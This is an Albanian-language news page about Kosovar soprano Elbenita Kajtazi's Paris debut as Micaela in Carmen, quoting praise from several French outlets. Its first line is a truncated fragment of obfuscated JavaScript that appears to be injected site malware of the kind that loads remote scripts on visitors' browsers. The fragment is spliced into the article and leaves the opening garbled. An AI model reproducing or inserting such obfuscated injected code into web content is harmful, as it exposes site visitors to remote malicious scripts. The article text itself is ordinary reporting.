;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mediet franceze shkruajnë për debutimin madhështor të sopranos kosovare në Paris

By

Sopranoja kosovare Elbenita Kajtazi së fundmi ka debutuar në opera në Paris.

Ajo me anë të një postimi në Facebook, ndau disa nga shkrimet e shtypit francez në lidhje me paraqitjen e saj.

Mediumi francez De La Cour Au Jardin e cilësoi Kajtazin si jashtëzakonisht bindëse në portretizimin e personazhit Micaela, me një vokal të fuqishëm e të mrekullueshëm.

“Micaela është sopranoja e shquar kosovare Elbenita Kajtazi, e cila po debuton në Opéra comique. Me një teknikë vokale të mrekullueshme dhe të paarritshme , një delikatesë të pamohueshme në timbër dhe një mjeshtëri të bukur në fuqin vokale. Ajo ishte jashtzakonisht bindëse në portretizimin e personazhit të brishtë, e paraqitur si një dashnore e pakënaqur e brigadierit”, ka shkruar mediumi De La Cour Au.

Edhe Forum Opera pati lëvdata për paraqitjen e Kajtazit, duke e cilësuar debutimin e saj si veçanërisht të shquar, njofton Klankosova.tv

“Elbenita Kajtazi  portretizon një Micaela të vendosur, e cila nuk heziton të puthë në buzë Don José në fund të duetit të tyre. Sopranoja kosovare bëri një debutim veçanërisht të shquar në Opéra-Comique.  Aria e saj  “Unë them se asgjë nuk më tremb”, interpretuar me ndjeshmëri të madhe dhe një zë të kthjellët me nota të larta rrezatuese, i dha asaj një duartrokitje të madhe nga publiku”, ka shkruar Forum Opera.

Mediumi France Info tha se sopranoja kosovare e shfaqi personazhin Micaela në mënyrën më të mirë të mundshme.

“Një përmendje të veçantë  meriton Elbenita Kajtazi  e cila mishëron një Micaela jashtëzakonisht prekëse, të dashur dhe shumë të guximshme. Sopranoja kosovare u duartrokit gjatë në aktin e tretë, kur me zërin e saj të kristaltë arrin të bindë Don José, një ushtar dezertor i dashuruar marrëzisht pas Carmen, që ta ndjekë te nëna e saj që po vdes”, ka shkruar France Info.

Artikuj të ngjashëm